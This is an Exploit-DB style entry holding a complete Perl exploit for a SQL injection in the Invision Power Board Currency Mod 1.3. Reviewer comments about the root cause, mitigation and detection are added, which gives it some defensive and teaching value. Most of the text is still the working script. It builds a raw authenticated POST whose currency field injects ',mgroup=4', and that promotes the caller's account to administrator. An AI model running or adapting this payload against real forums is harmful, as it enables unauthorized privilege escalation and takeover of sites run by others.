Invision Power Board Currency Mod(edit) SQL injection
# Title: Invision Power Board Currency Mod(edit) SQL injection
# EDB-ID: 11702
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-03-12
# Verified: no
# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection
# Date: 17/04/2007
# Author: Pr0T3cT10n
# Software Link: www.invisionpower.com
# Version: 1.3
# Tested on: 1.3
# CVE:
# Code:
#!/usr/bin/perl
#########################################################################
# Invision Power Board Currency Mod(edit) SQL injection.                #
# Bug found by Pr0T3cT10n, pr0t3ct10n@gmail.com                         #
# The exploit is updating your user to an admin account                 #
# **YOU SHOULD HAVE CURRENCY EDIT ACCESS!**                             #
#########################################################################
#
# Reviewer notes (defensive reading of this proof of concept):
#
# What the script does: it sends one authenticated HTTP POST to the
# moderator control panel action `act=modcp&CODE=docurrencyedit` for the
# caller's own member id. The form field `currency` carries
# "1%20%2Cmgroup=4", which URL-decodes to "1 ,mgroup=4".
#
# Root cause (inferred from the author's SQL comment further down, not from
# the mod's source, which is not shown here): the `currency` value appears
# to be placed unquoted and unvalidated into the SET clause of an UPDATE on
# ibf_members, so a comma lets the request assign additional columns.
# According to the header above, setting mgroup to 4 makes the account an
# admin. Since currency-edit access is a stated precondition, this is a
# privilege escalation from a user with that permission to administrator.
#
# Status: the listing marks this entry as unverified and the author lists
# only version 1.3 as tested.
#
# Mitigation: treat `currency` as a number on the server (integer cast or
# strict numeric validation) and bind it as a query parameter instead of
# concatenating it; limit which groups hold currency-edit permission.
#
# Detection: look for POSTs to CODE=docurrencyedit whose `currency` field
# is not purely numeric (an encoded comma or an `=` inside the value), and
# audit ibf_members for mgroup changes that have no matching admin action.
# The fixed "User-Agent: No_Agent" string is a weak indicator only, since
# it is an editable literal in this script.
#
use IO::Socket;
use Digest::MD5 qw(md5_hex);

# Positional arguments: target host, forum path, member id, password.
$host = $ARGV[0];
$path = $ARGV[1];
$id = $ARGV[2];
$passwd = $ARGV[3];

# Print usage and stop when the fourth argument is missing or false.
if(!$ARGV[3]) {
    print "#################################################\n";
    print "## IPB Currency Mod SQL injection Exploit. ##\n";
    print "## Discoverd By Pr0T3cT10n. ##\n";
    print "#################################################\n";
    print "$0 [host] [path] [your id] [your passowrd]\n";
    print "$0 host.com /forum 567 123456\n";
    print "#################################################\n";
    exit();
}

# Plain-text HTTP over TCP port 80; the port is fixed and there is no TLS.
print "[~] Connecting $host:80...\n";
$socket = IO::Socket::INET->new( Proto => "tcp" , PeerAddr => $host , PeerPort => "80") or die("[-] Connection faild.\n");
print "[+] Connected.\n[~] Sending POST information...\n";

# The request is assembled by hand as a raw HTTP/1.1 message.
$pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1\r\n";
$pack.= "Host: " . $host . "\r\n";
$pack.= "User-Agent: No_Agent\r\n";
$pack.= "Accept: */*\r\n";
# Session cookie: the member id plus the MD5 hex digest of the password.
# NOTE(review): as used here the cookie value is derived from the password
# alone, which would make a captured pass_hash password-equivalent; confirm
# against the board version in use.
$pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). "\r\n";
$pack.= "Keep-Alive: 300\r\n";
$pack.= "Connection: keep-alive\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
# Content-Length matches the 24-byte body on the next statement.
$pack.= "Content-Length: 24\r\n\r\n";
# This is the injection point: everything after "currency=" is what the
# author's comment shows landing in the SET clause.
$pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id'
print $socket $pack;

# The response is read line by line and success is reported on the first
# line containing this specific table tag. That is a page-layout match, not
# a check that the member row actually changed.
while($res = <$socket>) {
    if($res =~ /<table align='center' cellpadding="4" class="tablefill">/) {
        print("[+] succeed.\n");
        exit();
    }
}
print("[-] Faild.\n");
exit();